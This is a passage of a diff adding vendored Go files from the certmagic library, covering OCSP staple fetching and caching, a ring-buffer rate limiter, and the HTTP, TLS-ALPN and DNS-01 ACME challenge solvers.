|
||||
pemBundle = bundle.Bytes()
|
||||
}
|
||||
|
||||
var ocspBytes []byte
|
||||
var ocspResp *ocsp.Response
|
||||
var ocspErr error
|
||||
var gotNewOCSP bool
|
||||
|
||||
// First try to load OCSP staple from storage and see if
|
||||
// we can still use it.
|
||||
ocspStapleKey := StorageKeys.OCSPStaple(cert, pemBundle)
|
||||
cachedOCSP, err := storage.Load(ctx, ocspStapleKey)
|
||||
if err == nil {
|
||||
resp, err := ocsp.ParseResponse(cachedOCSP, nil)
|
||||
if err == nil {
|
||||
if freshOCSP(resp) {
|
||||
// staple is still fresh; use it
|
||||
ocspBytes = cachedOCSP
|
||||
ocspResp = resp
|
||||
}
|
||||
} else {
|
||||
// invalid contents; delete the file
|
||||
// (we do this independently of the maintenance routine because
|
||||
// in this case we know for sure this should be a staple file
|
||||
// because we loaded it by name, whereas the maintenance routine
|
||||
// just iterates the list of files, even if somehow a non-staple
|
||||
// file gets in the folder. in this case we are sure it is corrupt.)
|
||||
err := storage.Delete(ctx, ocspStapleKey)
|
||||
if err != nil {
|
||||
log.Printf("[WARNING] Unable to delete invalid OCSP staple file: %v", err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// If we couldn't get a fresh staple by reading the cache,
|
||||
// then we need to request it from the OCSP responder
|
||||
if ocspResp == nil || len(ocspBytes) == 0 {
|
||||
ocspBytes, ocspResp, ocspErr = getOCSPForCert(ocspConfig, pemBundle)
|
||||
if ocspErr != nil {
|
||||
// An error here is not a problem because a certificate may simply
|
||||
// not contain a link to an OCSP server. But we should log it anyway.
|
||||
// There's nothing else we can do to get OCSP for this certificate,
|
||||
// so we can return here with the error.
|
||||
return fmt.Errorf("no OCSP stapling for %v: %v", cert.Names, ocspErr)
|
||||
}
|
||||
gotNewOCSP = true
|
||||
}
|
||||
|
||||
if ocspResp.NextUpdate.After(cert.Leaf.NotAfter) {
|
||||
// uh oh, this OCSP response expires AFTER the certificate does, that's kinda bogus.
|
||||
// it was the reason a lot of Symantec-validated sites (not Caddy) went down
|
||||
// in October 2017. https://twitter.com/mattiasgeniar/status/919432824708648961
|
||||
return fmt.Errorf("invalid: OCSP response for %v valid after certificate expiration (%s)",
|
||||
cert.Names, cert.Leaf.NotAfter.Sub(ocspResp.NextUpdate))
|
||||
}
|
||||
|
||||
// Attach the latest OCSP response to the certificate; this is NOT the same
|
||||
// as stapling it, which we do below only if the status is Good, but it is
|
||||
// useful to keep with the cert in order to act on it later (like if Revoked).
|
||||
cert.ocsp = ocspResp
|
||||
|
||||
// If the response is good, staple it to the certificate. If the OCSP
|
||||
// response was not loaded from storage, we persist it for next time.
|
||||
if ocspResp.Status == ocsp.Good {
|
||||
cert.Certificate.OCSPStaple = ocspBytes
|
||||
if gotNewOCSP {
|
||||
err := storage.Store(ctx, ocspStapleKey, ocspBytes)
|
||||
if err != nil {
|
||||
return fmt.Errorf("unable to write OCSP staple file for %v: %v", cert.Names, err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// getOCSPForCert takes a PEM encoded cert or cert bundle returning the raw OCSP response,
|
||||
// the parsed response, and an error, if any. The returned []byte can be passed directly
|
||||
// into the OCSPStaple property of a tls.Certificate. If the bundle only contains the
|
||||
// issued certificate, this function will try to get the issuer certificate from the
|
||||
// IssuingCertificateURL in the certificate. If the []byte and/or ocsp.Response return
|
||||
// values are nil, the OCSP status may be assumed OCSPUnknown.
|
||||
//
|
||||
// Borrowed from xenolf.
|
||||
func getOCSPForCert(ocspConfig OCSPConfig, bundle []byte) ([]byte, *ocsp.Response, error) {
|
||||
// TODO: Perhaps this should be synchronized too, with a Locker?
|
||||
|
||||
certificates, err := parseCertsFromPEMBundle(bundle)
|
||||
if err != nil {
|
||||
return nil, nil, err
|
||||
}
|
||||
|
||||
// We expect the certificate slice to be ordered downwards the chain.
|
||||
// SRV CRT -> CA. We need to pull the leaf and issuer certs out of it,
|
||||
// which should always be the first two certificates. If there's no
|
||||
// OCSP server listed in the leaf cert, there's nothing to do. And if
|
||||
// we have only one certificate so far, we need to get the issuer cert.
|
||||
issuedCert := certificates[0]
|
||||
if len(issuedCert.OCSPServer) == 0 {
|
||||
return nil, nil, fmt.Errorf("no OCSP server specified in certificate")
|
||||
}
|
||||
|
||||
// apply override for responder URL
|
||||
respURL := issuedCert.OCSPServer[0]
|
||||
if len(ocspConfig.ResponderOverrides) > 0 {
|
||||
if override, ok := ocspConfig.ResponderOverrides[respURL]; ok {
|
||||
respURL = override
|
||||
}
|
||||
}
|
||||
if respURL == "" {
|
||||
return nil, nil, fmt.Errorf("override disables querying OCSP responder: %v", issuedCert.OCSPServer[0])
|
||||
}
|
||||
|
||||
if len(certificates) == 1 {
|
||||
if len(issuedCert.IssuingCertificateURL) == 0 {
|
||||
return nil, nil, fmt.Errorf("no URL to issuing certificate")
|
||||
}
|
||||
|
||||
resp, err := http.Get(issuedCert.IssuingCertificateURL[0])
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("getting issuer certificate: %v", err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
issuerBytes, err := io.ReadAll(io.LimitReader(resp.Body, 1024*1024))
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("reading issuer certificate: %v", err)
|
||||
}
|
||||
|
||||
issuerCert, err := x509.ParseCertificate(issuerBytes)
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("parsing issuer certificate: %v", err)
|
||||
}
|
||||
|
||||
// insert it into the slice on position 0;
|
||||
// we want it ordered right SRV CRT -> CA
|
||||
certificates = append(certificates, issuerCert)
|
||||
}
|
||||
|
||||
issuerCert := certificates[1]
|
||||
|
||||
ocspReq, err := ocsp.CreateRequest(issuedCert, issuerCert, nil)
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("creating OCSP request: %v", err)
|
||||
}
|
||||
|
||||
reader := bytes.NewReader(ocspReq)
|
||||
req, err := http.Post(respURL, "application/ocsp-request", reader)
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("making OCSP request: %v", err)
|
||||
}
|
||||
defer req.Body.Close()
|
||||
|
||||
ocspResBytes, err := io.ReadAll(io.LimitReader(req.Body, 1024*1024))
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("reading OCSP response: %v", err)
|
||||
}
|
||||
|
||||
ocspRes, err := ocsp.ParseResponse(ocspResBytes, issuerCert)
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("parsing OCSP response: %v", err)
|
||||
}
|
||||
|
||||
return ocspResBytes, ocspRes, nil
|
||||
}
|
||||
|
||||
// freshOCSP returns true if resp is still fresh,
|
||||
// meaning that it is not expedient to get an
|
||||
// updated response from the OCSP server.
|
||||
func freshOCSP(resp *ocsp.Response) bool {
|
||||
nextUpdate := resp.NextUpdate
|
||||
// If there is an OCSP responder certificate, and it expires before the
|
||||
// OCSP response, use its expiration date as the end of the OCSP
|
||||
// response's validity period.
|
||||
if resp.Certificate != nil && resp.Certificate.NotAfter.Before(nextUpdate) {
|
||||
nextUpdate = resp.Certificate.NotAfter
|
||||
}
|
||||
// start checking OCSP staple about halfway through validity period for good measure
|
||||
refreshTime := resp.ThisUpdate.Add(nextUpdate.Sub(resp.ThisUpdate) / 2)
|
||||
return time.Now().Before(refreshTime)
|
||||
}
|
243
vendor/github.com/caddyserver/certmagic/ratelimiter.go
generated
vendored
Normal file
243
vendor/github.com/caddyserver/certmagic/ratelimiter.go
generated
vendored
Normal file
@ -0,0 +1,243 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"log"
|
||||
"runtime"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
// NewRateLimiter returns a rate limiter that allows up to maxEvents
|
||||
// in a sliding window of size window. If maxEvents and window are
|
||||
// both 0, or if maxEvents is non-zero and window is 0, rate limiting
|
||||
// is disabled. This function panics if maxEvents is less than 0 or
|
||||
// if maxEvents is 0 and window is non-zero, which is considered to be
|
||||
// an invalid configuration, as it would never allow events.
|
||||
func NewRateLimiter(maxEvents int, window time.Duration) *RingBufferRateLimiter {
|
||||
if maxEvents < 0 {
|
||||
panic("maxEvents cannot be less than zero")
|
||||
}
|
||||
if maxEvents == 0 && window != 0 {
|
||||
panic("invalid configuration: maxEvents = 0 and window != 0 would not allow any events")
|
||||
}
|
||||
rbrl := &RingBufferRateLimiter{
|
||||
window: window,
|
||||
ring: make([]time.Time, maxEvents),
|
||||
started: make(chan struct{}),
|
||||
stopped: make(chan struct{}),
|
||||
ticket: make(chan struct{}),
|
||||
}
|
||||
go rbrl.loop()
|
||||
<-rbrl.started // make sure loop is ready to receive before we return
|
||||
return rbrl
|
||||
}
|
||||
|
||||
// RingBufferRateLimiter uses a ring to enforce rate limits
|
||||
// consisting of a maximum number of events within a single
|
||||
// sliding window of a given duration. An empty value is
|
||||
// not valid; use NewRateLimiter to get one.
|
||||
type RingBufferRateLimiter struct {
|
||||
window time.Duration
|
||||
ring []time.Time // maxEvents == len(ring)
|
||||
cursor int // always points to the oldest timestamp
|
||||
mu sync.Mutex // protects ring, cursor, and window
|
||||
started chan struct{}
|
||||
stopped chan struct{}
|
||||
ticket chan struct{}
|
||||
}
|
||||
|
||||
// Stop cleans up r's scheduling goroutine.
|
||||
func (r *RingBufferRateLimiter) Stop() {
|
||||
close(r.stopped)
|
||||
}
|
||||
|
||||
func (r *RingBufferRateLimiter) loop() {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
log.Printf("panic: ring buffer rate limiter: %v\n%s", err, buf)
|
||||
}
|
||||
}()
|
||||
|
||||
for {
|
||||
// if we've been stopped, return
|
||||
select {
|
||||
case <-r.stopped:
|
||||
return
|
||||
default:
|
||||
}
|
||||
|
||||
if len(r.ring) == 0 {
|
||||
if r.window == 0 {
|
||||
// rate limiting is disabled; always allow immediately
|
||||
r.permit()
|
||||
continue
|
||||
}
|
||||
panic("invalid configuration: maxEvents = 0 and window != 0 does not allow any events")
|
||||
}
|
||||
|
||||
// wait until next slot is available or until we've been stopped
|
||||
r.mu.Lock()
|
||||
then := r.ring[r.cursor].Add(r.window)
|
||||
r.mu.Unlock()
|
||||
waitDuration := time.Until(then)
|
||||
waitTimer := time.NewTimer(waitDuration)
|
||||
select {
|
||||
case <-waitTimer.C:
|
||||
r.permit()
|
||||
case <-r.stopped:
|
||||
waitTimer.Stop()
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Allow returns true if the event is allowed to
|
||||
// happen right now. It does not wait. If the event
|
||||
// is allowed, a ticket is claimed.
|
||||
func (r *RingBufferRateLimiter) Allow() bool {
|
||||
select {
|
||||
case <-r.ticket:
|
||||
return true
|
||||
default:
|
||||
return false
|
||||
}
|
||||
}
|
||||
|
||||
// Wait blocks until the event is allowed to occur. It returns an
|
||||
// error if the context is cancelled.
|
||||
func (r *RingBufferRateLimiter) Wait(ctx context.Context) error {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return context.Canceled
|
||||
case <-r.ticket:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
// MaxEvents returns the maximum number of events that
|
||||
// are allowed within the sliding window.
|
||||
func (r *RingBufferRateLimiter) MaxEvents() int {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
return len(r.ring)
|
||||
}
|
||||
|
||||
// SetMaxEvents changes the maximum number of events that are
|
||||
// allowed in the sliding window. If the new limit is lower,
|
||||
// the oldest events will be forgotten. If the new limit is
|
||||
// higher, the window will suddenly have capacity for new
|
||||
// reservations. It panics if maxEvents is 0 and window size
|
||||
// is not zero.
|
||||
func (r *RingBufferRateLimiter) SetMaxEvents(maxEvents int) {
|
||||
newRing := make([]time.Time, maxEvents)
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
|
||||
if r.window != 0 && maxEvents == 0 {
|
||||
panic("invalid configuration: maxEvents = 0 and window != 0 would not allow any events")
|
||||
}
|
||||
|
||||
// only make the change if the new limit is different
|
||||
if maxEvents == len(r.ring) {
|
||||
return
|
||||
}
|
||||
|
||||
// the new ring may be smaller; fast-forward to the
|
||||
// oldest timestamp that will be kept in the new
|
||||
// ring so the oldest ones are forgotten and the
|
||||
// newest ones will be remembered
|
||||
sizeDiff := len(r.ring) - maxEvents
|
||||
for i := 0; i < sizeDiff; i++ {
|
||||
r.advance()
|
||||
}
|
||||
|
||||
if len(r.ring) > 0 {
|
||||
// copy timestamps into the new ring until we
|
||||
// have either copied all of them or have reached
|
||||
// the capacity of the new ring
|
||||
startCursor := r.cursor
|
||||
for i := 0; i < len(newRing); i++ {
|
||||
newRing[i] = r.ring[r.cursor]
|
||||
r.advance()
|
||||
if r.cursor == startCursor {
|
||||
// new ring is larger than old one;
|
||||
// "we've come full circle"
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
r.ring = newRing
|
||||
r.cursor = 0
|
||||
}
|
||||
|
||||
// Window returns the size of the sliding window.
|
||||
func (r *RingBufferRateLimiter) Window() time.Duration {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
return r.window
|
||||
}
|
||||
|
||||
// SetWindow changes r's sliding window duration to window.
|
||||
// Goroutines that are already blocked on a call to Wait()
|
||||
// will not be affected. It panics if window is non-zero
|
||||
// but the max event limit is 0.
|
||||
func (r *RingBufferRateLimiter) SetWindow(window time.Duration) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
if window != 0 && len(r.ring) == 0 {
|
||||
panic("invalid configuration: maxEvents = 0 and window != 0 would not allow any events")
|
||||
}
|
||||
r.window = window
|
||||
}
|
||||
|
||||
// permit allows one event through the throttle. This method
|
||||
// blocks until a goroutine is waiting for a ticket or until
|
||||
// the rate limiter is stopped.
|
||||
func (r *RingBufferRateLimiter) permit() {
|
||||
for {
|
||||
select {
|
||||
case r.started <- struct{}{}:
|
||||
// notify parent goroutine that we've started; should
|
||||
// only happen once, before constructor returns
|
||||
continue
|
||||
case <-r.stopped:
|
||||
return
|
||||
case r.ticket <- struct{}{}:
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
if len(r.ring) > 0 {
|
||||
r.ring[r.cursor] = time.Now()
|
||||
r.advance()
|
||||
}
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// advance moves the cursor to the next position.
|
||||
// It is NOT safe for concurrent use, so it must
|
||||
// be called inside a lock on r.mu.
|
||||
func (r *RingBufferRateLimiter) advance() {
|
||||
r.cursor++
|
||||
if r.cursor >= len(r.ring) {
|
||||
r.cursor = 0
|
||||
}
|
||||
}
|
724
vendor/github.com/caddyserver/certmagic/solvers.go
generated
vendored
Normal file
724
vendor/github.com/caddyserver/certmagic/solvers.go
generated
vendored
Normal file
@ -0,0 +1,724 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/tls"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"log"
|
||||
"net"
|
||||
"net/http"
|
||||
"path"
|
||||
"runtime"
|
||||
"strings"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
|
||||
"github.com/libdns/libdns"
|
||||
"github.com/mholt/acmez"
|
||||
"github.com/mholt/acmez/acme"
|
||||
"github.com/miekg/dns"
|
||||
)
|
||||
|
||||
// httpSolver solves the HTTP challenge. It must be
|
||||
// associated with a config and an address to use
|
||||
// for solving the challenge. If multiple httpSolvers
|
||||
// are initialized concurrently, the first one to
|
||||
// begin will start the server, and the last one to
|
||||
// finish will stop the server. This solver must be
|
||||
// wrapped by a distributedSolver to work properly,
|
||||
// because the only way the HTTP challenge handler
|
||||
// can access the keyAuth material is by loading it
|
||||
// from storage, which is done by distributedSolver.
|
||||
type httpSolver struct {
|
||||
closed int32 // accessed atomically
|
||||
acmeIssuer *ACMEIssuer
|
||||
address string
|
||||
}
|
||||
|
||||
// Present starts an HTTP server if none is already listening on s.address.
|
||||
func (s *httpSolver) Present(ctx context.Context, _ acme.Challenge) error {
|
||||
solversMu.Lock()
|
||||
defer solversMu.Unlock()
|
||||
|
||||
si := getSolverInfo(s.address)
|
||||
si.count++
|
||||
if si.listener != nil {
|
||||
return nil // already be served by us
|
||||
}
|
||||
|
||||
// notice the unusual error handling here; we
|
||||
// only continue to start a challenge server if
|
||||
// we got a listener; in all other cases return
|
||||
ln, err := robustTryListen(s.address)
|
||||
if ln == nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// successfully bound socket, so save listener and start key auth HTTP server
|
||||
si.listener = ln
|
||||
go s.serve(ctx, si)
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// serve is an HTTP server that serves only HTTP challenge responses.
|
||||
func (s *httpSolver) serve(ctx context.Context, si *solverInfo) {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
log.Printf("panic: http solver server: %v\n%s", err, buf)
|
||||
}
|
||||
}()
|
||||
defer close(si.done)
|
||||
httpServer := &http.Server{
|
||||
Handler: s.acmeIssuer.HTTPChallengeHandler(http.NewServeMux()),
|
||||
BaseContext: func(listener net.Listener) context.Context { return ctx },
|
||||
}
|
||||
httpServer.SetKeepAlivesEnabled(false)
|
||||
err := httpServer.Serve(si.listener)
|
||||
if err != nil && atomic.LoadInt32(&s.closed) != 1 {
|
||||
log.Printf("[ERROR] key auth HTTP server: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// CleanUp cleans up the HTTP server if it is the last one to finish.
|
||||
func (s *httpSolver) CleanUp(ctx context.Context, _ acme.Challenge) error {
|
||||
solversMu.Lock()
|
||||
defer solversMu.Unlock()
|
||||
si := getSolverInfo(s.address)
|
||||
si.count--
|
||||
if si.count == 0 {
|
||||
// last one out turns off the lights
|
||||
atomic.StoreInt32(&s.closed, 1)
|
||||
if si.listener != nil {
|
||||
si.listener.Close()
|
||||
<-si.done
|
||||
}
|
||||
delete(solvers, s.address)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// tlsALPNSolver is a type that can solve TLS-ALPN challenges.
|
||||
// It must have an associated config and address on which to
|
||||
// serve the challenge.
|
||||
type tlsALPNSolver struct {
|
||||
config *Config
|
||||
address string
|
||||
}
|
||||
|
||||
// Present adds the certificate to the certificate cache and, if
|
||||
// needed, starts a TLS server for answering TLS-ALPN challenges.
|
||||
func (s *tlsALPNSolver) Present(ctx context.Context, chal acme.Challenge) error {
|
||||
// we pre-generate the certificate for efficiency with multi-perspective
|
||||
// validation, so it only has to be done once (at least, by this instance;
|
||||
// distributed solving does not have that luxury, oh well) - update the
|
||||
// challenge data in memory to be the generated certificate
|
||||
cert, err := acmez.TLSALPN01ChallengeCert(chal)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
key := challengeKey(chal)
|
||||
activeChallengesMu.Lock()
|
||||
chalData := activeChallenges[key]
|
||||
chalData.data = cert
|
||||
activeChallenges[key] = chalData
|
||||
activeChallengesMu.Unlock()
|
||||
|
||||
// the rest of this function increments the
|
||||
// challenge count for the solver at this
|
||||
// listener address, and if necessary, starts
|
||||
// a simple TLS server
|
||||
|
||||
solversMu.Lock()
|
||||
defer solversMu.Unlock()
|
||||
|
||||
si := getSolverInfo(s.address)
|
||||
si.count++
|
||||
if si.listener != nil {
|
||||
return nil // already be served by us
|
||||
}
|
||||
|
||||
// notice the unusual error handling here; we
|
||||
// only continue to start a challenge server if
|
||||
// we got a listener; in all other cases return
|
||||
ln, err := robustTryListen(s.address)
|
||||
if ln == nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// we were able to bind the socket, so make it into a TLS
|
||||
// listener, store it with the solverInfo, and start the
|
||||
// challenge server
|
||||
|
||||
si.listener = tls.NewListener(ln, s.config.TLSConfig())
|
||||
|
||||
go func() {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
log.Printf("panic: tls-alpn solver server: %v\n%s", err, buf)
|
||||
}
|
||||
}()
|
||||
defer close(si.done)
|
||||
for {
|
||||
conn, err := si.listener.Accept()
|
||||
if err != nil {
|
||||
if atomic.LoadInt32(&si.closed) == 1 {
|
||||
return
|
||||
}
|
||||
log.Printf("[ERROR] TLS-ALPN challenge server: accept: %v", err)
|
||||
continue
|
||||
}
|
||||
go s.handleConn(conn)
|
||||
}
|
||||
}()
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// handleConn completes the TLS handshake and then closes conn.
|
||||
func (*tlsALPNSolver) handleConn(conn net.Conn) {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
log.Printf("panic: tls-alpn solver handler: %v\n%s", err, buf)
|
||||
}
|
||||
}()
|
||||
defer conn.Close()
|
||||
tlsConn, ok := conn.(*tls.Conn)
|
||||
if !ok {
|
||||
log.Printf("[ERROR] TLS-ALPN challenge server: expected tls.Conn but got %T: %#v", conn, conn)
|
||||
return
|
||||
}
|
||||
err := tlsConn.Handshake()
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] TLS-ALPN challenge server: handshake: %v", err)
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
// CleanUp removes the challenge certificate from the cache, and if
|
||||
// it is the last one to finish, stops the TLS server.
|
||||
func (s *tlsALPNSolver) CleanUp(ctx context.Context, chal acme.Challenge) error {
|
||||
solversMu.Lock()
|
||||
defer solversMu.Unlock()
|
||||
si := getSolverInfo(s.address)
|
||||
si.count--
|
||||
if si.count == 0 {
|
||||
// last one out turns off the lights
|
||||
atomic.StoreInt32(&si.closed, 1)
|
||||
if si.listener != nil {
|
||||
si.listener.Close()
|
||||
<-si.done
|
||||
}
|
||||
delete(solvers, s.address)
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// DNS01Solver is a type that makes libdns providers usable
|
||||
// as ACME dns-01 challenge solvers.
|
||||
// See https://github.com/libdns/libdns
|
||||
type DNS01Solver struct {
|
||||
// The implementation that interacts with the DNS
|
||||
// provider to set or delete records. (REQUIRED)
|
||||
DNSProvider ACMEDNSProvider
|
||||
|
||||
// The TTL for the temporary challenge records.
|
||||
TTL time.Duration
|
||||
|
||||
// How long to wait before starting propagation checks.
|
||||
// Default: 0 (no wait).
|
||||
PropagationDelay time.Duration
|
||||
|
||||
// Maximum time to wait for temporary DNS record to appear.
|
||||
// Set to -1 to disable propagation checks.
|
||||
// Default: 2 minutes.
|
||||
PropagationTimeout time.Duration
|
||||
|
||||
// Preferred DNS resolver(s) to use when doing DNS lookups.
|
||||
Resolvers []string
|
||||
|
||||
// Override the domain to set the TXT record on. This is
|
||||
// to delegate the challenge to a different domain. Note
|
||||
// that the solver doesn't follow CNAME/NS record.
|
||||
OverrideDomain string
|
||||
|
||||
txtRecords map[string]dnsPresentMemory // keyed by domain name
|
||||
txtRecordsMu sync.Mutex
|
||||
}
|
||||
|
||||
// Present creates the DNS TXT record for the given ACME challenge.
|
||||
func (s *DNS01Solver) Present(ctx context.Context, challenge acme.Challenge) error {
|
||||
dnsName := challenge.DNS01TXTRecordName()
|
||||
if s.OverrideDomain != "" {
|
||||
dnsName = s.OverrideDomain
|
||||
}
|
||||
keyAuth := challenge.DNS01KeyAuthorization()
|
||||
|
||||
// multiple identifiers can have the same ACME challenge
|
||||
// domain (e.g. example.com and *.example.com) so we need
|
||||
// to ensure that we don't solve those concurrently and
|
||||
// step on each challenges' metaphorical toes; see
|
||||
// https://github.com/caddyserver/caddy/issues/3474
|
||||
activeDNSChallenges.Lock(dnsName)
|
||||
|
||||
zone, err := findZoneByFQDN(dnsName, recursiveNameservers(s.Resolvers))
|
||||
if err != nil {
|
||||
return fmt.Errorf("could not determine zone for domain %q: %v", dnsName, err)
|
||||
}
|
||||
|
||||
rec := libdns.Record{
|
||||
Type: "TXT",
|
||||
Name: libdns.RelativeName(dnsName+".", zone),
|
||||
Value: keyAuth,
|
||||
TTL: s.TTL,
|
||||
}
|
||||
|
||||
results, err := s.DNSProvider.AppendRecords(ctx, zone, []libdns.Record{rec})
|
||||
if err != nil {
|
||||
return fmt.Errorf("adding temporary record for zone %s: %w", zone, err)
|
||||
}
|
||||
if len(results) != 1 {
|
||||
return fmt.Errorf("expected one record, got %d: %v", len(results), results)
|
||||
}
|
||||
|
||||
// remember the record and zone we got so we can clean up more efficiently
|
||||
s.txtRecordsMu.Lock()
|
||||
if s.txtRecords == nil {
|
||||
s.txtRecords = make(map[string]dnsPresentMemory)
|
||||
}
|
||||
s.txtRecords[dnsName] = dnsPresentMemory{dnsZone: zone, rec: results[0]}
|
||||
s.txtRecordsMu.Unlock()
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// Wait blocks until the TXT record created in Present() appears in
|
||||
// authoritative lookups, i.e. until it has propagated, or until
|
||||
// timeout, whichever is first.
|
||||
func (s *DNS01Solver) Wait(ctx context.Context, challenge acme.Challenge) error {
|
||||
// if configured to, pause before doing propagation checks
|
||||
// (even if they are disabled, the wait might be desirable on its own)
|
||||
if s.PropagationDelay > 0 {
|
||||
select {
|
||||
case <-time.After(s.PropagationDelay):
|
||||
case <-ctx.Done():
|
||||
return ctx.Err()
|
||||
}
|
||||
}
|
||||
|
||||
// skip propagation checks if configured to do so
|
||||
if s.PropagationTimeout == -1 {
|
||||
return nil
|
||||
}
|
||||
|
||||
// prepare for the checks by determining what to look for
|
||||
dnsName := challenge.DNS01TXTRecordName()
|
||||
if s.OverrideDomain != "" {
|
||||
dnsName = s.OverrideDomain
|
||||
}
|
||||
keyAuth := challenge.DNS01KeyAuthorization()
|
||||
|
||||
// timings
|
||||
timeout := s.PropagationTimeout
|
||||
if timeout == 0 {
|
||||
timeout = 2 * time.Minute
|
||||
}
|
||||
const interval = 2 * time.Second
|
||||
|
||||
// how we'll do the checks
|
||||
resolvers := recursiveNameservers(s.Resolvers)
|
||||
|
||||
var err error
|
||||
start := time.Now()
|
||||
for time.Since(start) < timeout {
|
||||
select {
|
||||
case <-time.After(interval):
|
||||
case <-ctx.Done():
|
||||
return ctx.Err()
|
||||
}
|
||||
var ready bool
|
||||
ready, err = checkDNSPropagation(dnsName, keyAuth, resolvers)
|
||||
if err != nil {
|
||||
return fmt.Errorf("checking DNS propagation of %s: %w", dnsName, err)
|
||||
}
|
||||
if ready {
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
return fmt.Errorf("timed out waiting for record to fully propagate; verify DNS provider configuration is correct - last error: %v", err)
|
||||
}
|
||||
|
||||
// CleanUp deletes the DNS TXT record created in Present().
|
||||
func (s *DNS01Solver) CleanUp(ctx context.Context, challenge acme.Challenge) error {
|
||||
dnsName := challenge.DNS01TXTRecordName()
|
||||
|
||||
defer func() {
|
||||
// always forget about it so we don't leak memory
|
||||
s.txtRecordsMu.Lock()
|
||||
delete(s.txtRecords, dnsName)
|
||||
s.txtRecordsMu.Unlock()
|
||||
|
||||
// always do this last - but always do it!
|
||||
activeDNSChallenges.Unlock(dnsName)
|
||||
}()
|
||||
|
||||
// recall the record we created and zone we looked up
|
||||
s.txtRecordsMu.Lock()
|
||||
memory, ok := s.txtRecords[dnsName]
|
||||
if !ok {
|
||||
s.txtRecordsMu.Unlock()
|
||||
return fmt.Errorf("no memory of presenting a DNS record for %s (probably OK if presenting failed)", challenge.Identifier.Value)
|
||||
}
|
||||
s.txtRecordsMu.Unlock()
|
||||
|
||||
// clean up the record
|
||||
_, err := s.DNSProvider.DeleteRecords(ctx, memory.dnsZone, []libdns.Record{memory.rec})
|
||||
if err != nil {
|
||||
return fmt.Errorf("deleting temporary record for zone %s: %w", memory.dnsZone, err)
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
type dnsPresentMemory struct {
|
||||
dnsZone string
|
||||
rec libdns.Record
|
||||
}
|
||||
|
||||
// ACMEDNSProvider defines the set of operations required for
|
||||
// ACME challenges. A DNS provider must be able to append and
|
||||
// delete records in order to solve ACME challenges. Find one
|
||||
// you can use at https://github.com/libdns. If your provider
|
||||
// isn't implemented yet, feel free to contribute!
|
||||
type ACMEDNSProvider interface {
|
||||
libdns.RecordAppender
|
||||
libdns.RecordDeleter
|
||||
}
|
||||
|
||||
// activeDNSChallenges synchronizes DNS challenges for
|
||||
